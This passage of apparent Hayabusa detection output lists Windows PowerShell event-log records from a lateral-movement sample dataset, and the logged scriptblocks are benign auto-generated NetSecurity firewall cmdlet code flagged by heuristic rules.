(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.371 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.371 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.372 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.372 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 